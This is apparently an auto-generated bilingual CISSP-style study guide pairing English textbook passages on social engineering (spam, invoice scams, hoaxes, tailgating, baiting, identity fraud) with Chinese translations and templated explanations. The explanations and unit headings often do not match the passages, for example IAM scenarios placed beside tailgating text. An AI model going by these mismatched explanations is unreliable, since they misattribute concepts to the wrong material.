Unwanted email wastes your time while you sort through it, looking for legitimate messages. Spam wastes internet resources: storage capacity, computing cycles, and throughput. The primary countermeasure against spam is an email spam filter. These email filters can examine the header, subject, and contents of a message to look for keywords or phrases that identify it as a known type of spam, and

中文直译 / 整理

分钟),或要求紧急购买请求者通常不会购买的产品。 当怀疑存在商业电子邮 件欺骗时,请勿使用与商业电子邮件欺骗相同的通信渠道。 请拨打电话、亲自 前往其办公室、发送短信至其手机,或使用公司批准的内部消息服务。 通过建 立第二个“带外”联系渠道与请求者确认,可以进一步验证该信息是真实还是 虚假。 鲸钓 鲸钓 是一种针对特定高价值个人(根据职位、行业、媒体报道等)的鱼叉 式网络钓鱼形式,例如首席执行官或其他高级管理人员、管理员或高净值客户。 鲸钓攻击需要攻击者进行大量研究、规划和开发,以欺骗受害者。 这是因为这 些高级人员通常很清楚自己是高价值目标。 Spam 垃圾邮件 是任何不想要的和/或未经请求的电子邮件。 但垃圾邮件不仅仅是令 人反感的广告; 它也可能包含恶意内容和攻击向量。 垃圾邮件常被用作社会工 程攻击的载体。 垃圾邮件之所以成为问题,原因众多: 一些垃圾邮件携带恶意代码,例如病毒、逻辑炸弹、勒索软件或特 洛伊木马。 一些垃圾邮件携带社会工程攻击(也称为虚假信息)。 垃圾邮件在您筛选以寻找合法邮件时浪费了您的时间。 垃圾邮件浪费互联网资源:存储容量、计算周期和带宽。 防范垃圾邮件的主要措施是电子邮件垃圾邮件过滤器。

这些电子邮件过滤器可以检查 邮件的标题、主题和内容,以查找标识其为已知垃圾邮件类型的关键词或短语,并

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 65 / PDF P204

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

then take the appropriate actions to discard, quarantine, or block the message. Antispam software is a variation on the theme of antimalware software. It specifically monitors email communications for spam and other forms of unwanted email in order to stop hoaxes, identity theft, waste of resources, and possible distribution of malicious software. Antispam software can often be installed on email servers to protect an entire organization as well as on local client systems for supplemental filtering by the user.

In addition to client application or client-side spam filters, there are enterprise spam tools, including Sender Policy Framework (SPF), Domain Keys Identified Mail (DKIM), and Domain Message Authentication Reporting and Conformance (DMARC) (see Chapter 12, “Secure Communications and Network Attacks”). Another important issue to address when managing spam is spoofed email. A spoofed email is a message that has a fake or falsified source address. DMARC is used to filter spoofed messages.

Spam is most commonly associated with email, but spam also exists in instant messaging (IM), SMS, USENET (Network News Transfer Protocol [NNTP]), social media apps, and web content (such as threaded discussions, forums, comments, and blogs). Failing to block spam allows it to waste resources, consume bandwidth, distract workers from productive activities, and potentially expose users and systems to malware. Shoulder Surfing Shoulder surfing is often a physical world or in-person form of social engineering. Shoulder surfing occurs when someone is able to watch a user's keyboard or view their display.

Often, shoulder surfing is stopped by dividing worker groups by sensitivity levels and limiting access to certain areas of the building by using locked doors. Additionally, users should not orient their displays to be visible through windows (from outside) or walkways/doorways (for internal issues). And they should not work on sensitive data while in a public space. Password fields should mask characters as they are typed. Another defense against shoulder surfing is the use of screen filters, which limit the field of view to mostly a perpendicular orientation. Invoice Scams

中文直译 / 整理

然后采取适当的措施删除、隔离或阻止该邮件。 反垃圾软件是反恶意软件的一种变体。 它专门监控电子邮件通信,以检测垃圾 邮件和其他形式的 unwanted email,从而阻止骗局、身份盗窃、资源浪费以 及潜在恶意软件的传播。 反垃圾软件通常可安装在电子邮件服务器上,以保护 整个组织,也可安装在本地客户端系统上,供用户进行补充过滤。 除了客户端应用程序或客户端垃圾邮件过滤器外,还有企业级垃圾邮件工具, 包括发件人策略框架(SPF)、域密钥识别邮件(DKIM)和域消息身份验证报 告与一致性(DMARC)(参见第12章,“安全通信与网络攻击”)。 在管理垃圾邮件时需要解决的另一个重要问题是伪造邮件。 伪造邮件是指源地 址被伪造或篡改的邮件。 DMARC 用于过滤伪造的邮件。 垃圾邮件最常与电子邮件相关联,但也存在于即时消息(IM)、短信( SMS)、USENET(网络新闻传输协议 [NNTP])、社交媒体应用和网络内容 (如线程讨论、论坛、评论和博客)中。 未能阻止垃圾邮件会导致资源浪费、 带宽消耗、干扰员工从事生产性活动,并可能使用户和系统暴露于恶意软件 的风险之中。 肩部窥探 肩窥通常是物理世界或面对面形式的社会工程攻击。

肩窥发生在有人能够观察 用户的键盘输入或屏幕显示时。 通常,通过根据敏感级别划分员工组,并使用 上锁的门限制对建筑特定区域的访问,可以阻止肩窥。 此外,用户不应将屏幕 朝向窗户(外部)或走廊/门口(内部)以避免被看到,也不应在公共场合处理 敏感数据。 密码字段在输入时应隐藏字符。 另一种防范肩窥的方法是使用屏幕 滤光片,将可视角度限制在近乎垂直的方向。 发票诈骗

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 66 / PDF P205

组织流程:收购、剥离和治理委员会

组织变化会改变资产、责任和风险边界。

教材原文段落

Invoice scams are social engineering attacks that often attempt to steal funds from an organization or individuals through the presentation of a false invoice, often followed by strong inducements to pay. Attackers often try to target members of financial departments or accounting groups. Some invoice scams are actually spear phishing scams in disguise. It is also possible for a social engineer to use an invoice scam approach over a voice connection. This attack is similar to some forms of the BEC concept. In fact, some invoice scams are combined with BEC so that the invoice sent to an accounting worker is seemingly sent from the CEO.

This intertwining of attack elements adds more legitimacy to the invoice, thus potentially convincing the target to pay the invoice. To protect against invoice scams, workers must be informed of the proper channels through which they should receive invoices and the means by which to confirm that any invoices are actually valid. One such method is the use of assigned purchase order numbers from authorized work orders, which must then be included on all related invoices. When invoices arrive, they should be compared against the expected bills based on approved acquisitions.

Any invoice that is not expected or otherwise abnormal should trigger a face-toface discussion with the supervisor or other financial executive. Separation of duties should exist between workers who place orders for products and services and those who pay invoices. These two groups should also have a third group that audits and governs their activities. All potential acquisitions should be reviewed and approved by a supervisor, and then notice of the acquisition should be sent to the accounts payable department by that supervisor. Discovery of any fraudulent invoices must be reported to the authorities.

Digital transmission and postal delivery of invoice scams are considered a crime of fraud and potential theft. The sending of false invoices through the U.S. Postal Service may be considered postal fraud as well. Hoax A hoax is a form of social engineering designed to convince targets to perform an action that will cause problems or reduce their IT security. A hoax can be an email that proclaims some imminent threat is spreading across the Internet and that you must perform certain tasks in order to protect yourself. The hoax often claims that taking no action will result in harm. Victims may be instructed to delete files, change configuration settings, or install

中文直译 / 整理

发票诈骗是一种社会工程攻击,通常通过伪造发票并伴随强烈的付款诱导来窃 取组织或个人的资金。 攻击者常常针对财务部门或会计团队的成员。 一些发票 诈骗实际上是伪装成发票诈骗的鱼叉式网络钓鱼攻击。 社会工程师也可能通过 语音通话方式实施发票诈骗。 这种攻击类似于某些形式的BEC概念。 事实上,一些发票欺诈会与BEC结合, 使得发送给会计人员的发票看似来自首席执行官。 这种攻击元素的交织增加了 发票的合法性,从而可能诱使目标支付该发票。 为防范发票欺诈,员工必须了解接收发票的正规渠道以及验证发票真实性的方 法。 其中一种方法是使用经授权工作单分配的采购订单编号,该编号必须包含 在所有相关发票中。 当发票到达时,应与经批准采购所对应的预期账单进行核 对。 任何未预期或异常的发票都应触发与主管或其他财务高管的面对面讨论。 下单采购产品和服务的员工与支付发票的员工之间应实行职责分离。 这两组 人员还应由第三组人员对其活动进行审计和监管。 所有潜在采购都应由主管 审查并批准,然后由主管将采购通知发送至应付账款部门。 发现任何欺诈性发票都必须向当局报告。 通过数字传输和邮政寄送发票骗局 被视为欺诈和潜在盗窃罪。

通过美国邮政服务发送虚假发票也可能被视为邮 政欺诈。 Hoax 一个 骗局 是一种社会工程手段,旨在诱使目标执行会导致问题或降低其IT安全 性的操作。 这种骗局可能表现为一封电子邮件,宣称某种迫在眉睫的威胁正在 互联网上蔓延,你必须执行某些任务才能保护自己。 该骗局通常声称不采取行 动将导致损害。 受害者可能被指示删除文件、更改配置设置或安装

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:组织变化会改变资产、责任和风险边界。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“组织流程:收购、剥离和治理委员会”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

证书、签名、强认证常支持真实性。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 67 / PDF P206

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

fraudulent security software, which results in a compromised OS, a nonbooting OS, or a reduction in their security defenses. Additionally, hoax emails often encourage the victim to forward the message to all their contacts in order to “spread the word.” Hoax messages are often spoofed without a verifiable origin. Whenever you encounter a potential hoax or just are concerned that a claimed threat is real, do the research. A couple of great places to check for hoax information or to look up your suspected hoax message are snopes.com and phishtank.com. Impersonation and Masquerading Impersonation is the act of taking on the identity of someone else.

This can take place in person, over the phone, through email, by logging into someone's account, or through any other means of communication. Impersonation can also be known as masquerading, spoofing, and even identity fraud. In some circumstances, impersonation is defined as a more sophisticated and complex attack, whereas masquerading is amateurish and simpler. This distinction is emphasized in the difference between renting an Elvis costume (i.e., masquerading) for a party versus being a career Elvis impersonator.

Defenses against physical location impersonation can include the use of access badges and security guards, and requiring the presentation and verification of ID at all entrances. If nontypical personnel are to visit a facility, the visit should be prearranged and the security guards provided with reasonable and confirmed notice that a nonemployee will be visiting. The organization from which the visitor hails should provide identification details, including a photo ID. When the person arrives, their identity should be compared against the provided credentials. In most secure environments, visitors are not allowed to roam free.

Instead, an escort must accompany the visitor for their entire time within the company's security perimeter. Tailgating and Piggybacking Tailgating occurs when an unauthorized entity gains access to a facility under the authorization of a valid worker but without their knowledge. This attack can occur when a worker uses their valid credentials to unlock and open a door, then walks into the building as the door closes, granting the attacker the opportunity to stop the door from closing and to sneak in without the victim

中文直译 / 整理

欺诈性安全软件,从而导致操作系统被入侵、无法启动或安全防御能力下降。 此外,骗局邮件通常会鼓励受害者将该信息转发给所有联系人,以“广而告之”。 这些骗局信息通常被伪造,且无法追溯真实来源。 每当您遇到潜在的骗局或只是担心某项声称的威胁是真实的时,请进行调查。 检查骗局信息或查找您怀疑的骗局消息的绝佳地点包括snopes.com和 phishtank.com。 冒充和伪装 冒充是指假扮他人的身份。 这可以发生在面对面、电话、电子邮件、登录他 人的账户,或通过任何其他沟通方式。 冒充也可以称为伪装、欺骗,甚至身份欺诈。 在某些情况下,冒充被定义为 更复杂和高级的攻击,而伪装则显得业余且简单。 这种区别在租用一件 猫王服装(即伪装)参加派对与成为一名职业猫王模仿者之间的差异中得到了强 调。 防范物理位置冒充的措施可以包括使用门禁徽章和安保人员,并在所有入口处 要求出示并核实身份证明。 如果非典型人员需要访问设施,应提前安排访问, 并向安保人员提供合理且确认的通知,说明非员工将到访。 访客所属的组织应 提供身份信息,包括照片身份证。 当人员到达时,应将其身份与提供的证件进 行比对。 在大多数安全环境中,访客不允许自由活动。

相反,必须有专人全程 陪同访客,直至其离开公司安全区域。 尾随和搭便车 尾随发生在未经授权的实体在不知情的情况下,利用合法员工的授权进入设施。 当员工使用其有效凭证解锁并打开门,然后在门关闭时走进建筑物时,这种攻 击可能发生,这为攻击者提供了阻止门关闭并悄悄溜入而不被受害者察觉的机 会

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 68 / PDF P207

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

realizing. Tailgating is an attack that does not depend on the consent of the victim—just their obliviousness to what occurs behind them as they walk into a building. Each and every time a user unlocks or opens a door, they should ensure that it is closed and locked before walking away. This action alone eliminates tailgating, but it does require that workers change their behavior. There is also social pressure to hold open a door for someone who is walking up behind you, but this courtesy should not be extended to include secure entry points, even if you think you know the person walking up behind.

Company policy should be focused on changing user behavior toward more security, but realize that working against human nature is very hard. Therefore, other means of enforcing tailgating protections should be implemented. These can include the use of access control vestibules (previously known as mantraps), security cameras, and security guards. Security cameras act as a deterrent more than a prevention, but having a recording of tailgating events can help track down the perpetrators as well as pinpoint the workers who need more security training. A security guard can watch over an entrance to ensure that only valid personnel are let through a security checkpoint.

A problem similar to tailgating is piggybacking. Piggybacking occurs when an unauthorized entity gains access to a facility under the authorization of a valid worker by tricking the victim into providing consent. This could happen when the intruder feigns the need for assistance by holding a large box or lots of paperwork and asks someone to “hold the door.” The goal of the intruder is to distract the victim while the attacker gains access in order to prevent the victim from realizing that the attacker did not provide their own credentials.

This ploy depends on the good nature of most people to believe the pretext, especially when the intruder seems to have “dressed the part.” When someone asks for assistance in holding open a secured door, users should ask for proof of authorization or offer to swipe the person's access card on their behalf. Or, the worker should redirect the person to the main entrance controlled by security guards or call over a security guard to handle the situation. Also, the use of access control vestibules, turnstiles, and security cameras is useful in response to piggybacking. These controls reduce the chance of an outsider bluffing their way into your secured areas.

中文直译 / 整理

意识到。 尾随是一种不依赖受害者同意的攻击——仅依赖于他们在进入建筑物 时对身后发生的事情毫无察觉。 每次用户解锁或打开门时,都应确保在离开前将门关闭并上锁。 仅这一行为就 能有效防止尾随,但要求员工改变其行为习惯。 此外,当有人在你身后走近时, 社会压力往往会促使你为他们扶住门,但这种礼貌不应延伸至安全入口,即使 你认为自己认识身后的人。 公司政策应聚焦于引导用户养成更安全的行为习惯,但需认识到,与人性作对 非常困难。 因此,应采取其他手段来实施防尾随保护措施。 这些措施可包括使 用访问控制缓冲区(曾称作人 trap)、安防摄像头和安保人员。 安防摄像头 更多起到威慑作用而非预防作用,但记录尾随事件有助于追踪肇事者,并识别 出需要接受更多安全培训的员工。 安保人员可监控入口,确保只有经过授权的 人员才能通过安全检查点。 与尾随类似的问题是搭便车。 搭便车是指未经授权的实体通过欺骗受害者提供 同意,从而在合法员工的授权下进入设施。 当入侵者假装需要帮助,例如手持 一个大箱子或大量文件,并请求他人“帮忙开门”时,这种情况就可能发生。

入侵者的目标是分散受害者的注意力,以便攻击者在不提供自己凭证的情况下 进入,从而防止受害者意识到攻击者并未提供合法身份。 这种伎俩依赖于大多 数人的好心,使他们相信这种借口,尤其是当入侵者看起来“装扮得像回事” 时。 当有人请求协助开启安全门时,用户应要求提供授权证明,或代为刷该人的门 禁卡。 或者,工作人员应引导该人员前往由安保人员控制的主入口,或呼叫安 保人员处理该情况。 此外,使用门禁缓冲区、转闸和监控摄像头有助于应对尾 随行为。 这些措施可降低外部人员冒充进入受保护区域的可能性。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
学习单元 69 / PDF P208

第 208 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Baiting When direct physical entry isn't possible or attempts fail, adversaries may use a baiting technique to deposit malware onto internal systems. Baiting is when the attacker drops USB sticks, optical discs, or even wallets in a location where a worker is likely to encounter it. The hope is the worker will plug the USB drive or insert the disc into a work computer where the malware will auto-infect the system. The wallet often has a note in it with a URL or IP address along with credentials. The hope is the victim will visit the site from a work computer and be infected by a drive-bydownload event or be tricked by a phishing site.

Dumpster Diving Dumpster diving is the act of digging through trash, discarded equipment, or abandoned locations in order to obtain information about a target organization or individual. Typical collected items include old calendars, calling lists, handwritten meeting notes, discarded forms, product boxes, user manuals, sticky notes, printed reports, or the test sheet from a printer. Just about anything that is of any minor internal value or sensitivity is a treasure to be discovered through dumpster diving. The materials gathered via dumpster diving can be used to craft a more believable pretext.

To prevent dumpster diving, or at least reduce its value to an attacker, all documents should be shredded and/or incinerated before being discarded. Additionally, no storage media should ever be discarded in the trash; use a secure disposal technique or service. Secure storage media disposal often includes incineration, shredding, or chipping. Identity Fraud Identity fraud and identity theft are terms that are often used interchangeably. In fact, the U.S.

Department of Justice (DoJ) states that “Identity theft and identity fraud are terms used to refer to all types of crime in which someone wrongfully obtains and uses another person's personal data in some way that involves fraud or deception, typically for economic gain.” Identity fraud and identity theft can be both the purpose of a social engineering attack (i.e., to steal PII) as well as a tool used to further the success of a social engineering attack.

中文直译 / 整理

钓鱼 当无法直接物理进入或尝试失败时,攻击者可能使用诱饵技术将恶意软件 植入内部系统。 诱饵攻击是指攻击者在员工可能遇到的地方丢弃USB驱动 器、光盘,甚至钱包。 其目的是希望员工将USB驱动器插入或光盘放入工 作电脑,从而触发恶意软件自动感染系统。 钱包中通常附有一张纸条,包 含URL或IP地址以及凭证信息,期望受害者从工作电脑访问该网站,从而 通过“钓鱼网站”或“免交互下载”事件被感染。 翻垃圾 翻垃圾是指通过翻找垃圾、废弃设备或废弃地点,以获取有关目标组织或个人 的信息。 通常收集的物品包括旧日历、通话列表、手写会议记录、废弃表格、 产品包装盒、用户手册、便利贴、打印报告或打印机的测试页。 几乎所有具有 任何轻微内部价值或敏感性的物品,都是通过翻垃圾可以发现的宝藏。 通过翻 垃圾收集的材料可用于构建更可信的 pretext。 为防止翻垃圾,或至少降低其对攻击者的价值,所有文件在丢弃前都应进行 碎纸处理和/或焚烧。 此外,任何存储介质都绝不能丢弃在垃圾桶中; 应使 用安全的处置技术或服务。 安全的存储介质处置通常包括焚烧、碎纸或切片。 身份欺诈 身份欺诈和身份盗窃是经常被互换使用的术语。

事实上,美国司法部(DoJ) 指出:"身份盗窃和身份欺诈是指各种犯罪行为,即某人非法获取并使用他人 的个人信息,以欺诈或欺骗的方式进行,通常是为了经济利益。 " 身份欺诈和 身份盗窃既可以是社会工程攻击的目的(即窃取PII),也可以是用于进一步 提高社会工程攻击成功率的工具。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 208 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 70 / PDF P209

第 209 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

However, it is important to recognize that while we can use the terms as synonyms (especially in casual conversation), there is more value to be gained by understanding how they are different. Identity theft is the act of stealing someone's identity. Specifically, this can refer to the initial act of information gathering or elicitation where usernames, emails, passwords, answers to secret questions, credit card numbers, Social Security numbers, healthcare services numbers, and other related and relevant facts are stolen or otherwise obtained by the attacker.

So, the first definition of identity theft is the actual theft of the credentials and information for someone's accounts or financial positions. A second definition of identity theft is when those stolen credentials and details are used to take over someone's account. This could include logging into their account on an online service; making false charges to their credit card, ATM card, or debit card; writing false checks against their checking account; or opening a new line of credit in the victim's name using their Social Security number. When an attacker steals and uses a victim's credentials, this is known as credential hijacking.

This second definition of identity theft is also very similar to the definition of identity fraud. Fraud is when you claim something that is false to be true. Identity fraud is when you falsely claim to be someone else through the use of stolen information from the victim. Identity fraud is criminal impersonation or intentional deception for personal or financial gain. Examples of identity fraud include taking employment under someone else's Social Security number, initiating phone service or utilities in someone else's name, or using someone else's health insurance to gain medical services. You can consider identity theft and identity fraud to be a form of spoofing.

Spoofing is any action to hide a valid identity, often by taking on the identity of something else. In addition to the concept of human-focused spoofing (i.e., identity fraud), spoofing is a common tactic for malicious hackers against technology. Attackers often spoof email addresses, IP addresses, media access control (MAC) addresses, Address Resolution Protocol (ARP) communications, Wi-Fi networks, websites, mobile phone apps, and more. These and other spoofing-related topics are covered elsewhere in this book. Identity theft and identity fraud are also related to impersonation. Impersonation is the act of taking on someone's identity.

This might be accomplished by logging into their account with stolen credentials or claiming to be someone else when on the phone. These and other

中文直译 / 整理

然而,重要的是要认识到,尽管我们可以将这两个术语作为同义词使用 (尤其是在非正式对话中),但理解它们之间的差异能带来更大的价值。 身份盗用是指窃取他人身份的行为。 具体而言,这可能指最初的信息收集或诱 导行为,攻击者通过此类行为窃取或以其他方式获取用户名、电子邮件、密码、 秘密问题答案、信用卡号、社会保障号、医疗保健服务号以及其他相关事实。 因此,身份盗用的第一个定义是实际窃取他人账户或财务信息的凭证和数据。 身份盗用的第二个定义是指利用被盗的凭证和详细信息接管他人的账户。 这 可能包括登录其在线服务账户; 对其信用卡、ATM卡或借记卡进行虚假消费; 以其支票账户名义开具虚假支票; 或使用其社会保障号以受害者名义开设新 的信贷账户。 当攻击者窃取并使用受害者的凭证时,这被称为凭证劫持。 身份盗用的第二个定义与身份欺诈的定义也非常相似。 欺诈是指声称虚假的事 物为真实。 身份欺诈则是指通过使用从受害者处窃取的信息,虚假地声称自己 是他人。 身份欺诈是一种为个人或财务利益而进行的刑事冒充或故意欺骗行为。 身份欺诈的例子包括使用他人的社会保障号码就业、以他人的名义开通电话服 务或公用事业,或使用他人的医疗保险获取医疗服务。

您可以将身份盗窃和身份欺诈视为一种欺骗行为。 欺骗是指任何隐藏真实身份 的行为,通常通过冒充其他事物来实现。 除了以人类为目标的欺骗(即身份欺 诈)概念外,欺骗也是恶意黑客针对技术的常见手段。 攻击者经常伪造电子邮 件地址、IP地址、媒体访问控制(MAC)地址、地址解析协议(ARP)通信、 Wi‑Fi网络、网站、移动应用程序等。 本章其他地方将涵盖这些及其他与欺骗相 关的话题。 身份盗窃和身份欺诈也与冒充有关。 冒充是指冒用他人的身份。 这可能 通过使用被盗的凭证登录其账户,或在电话中声称自己是他人来实现。 这些以及其他

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

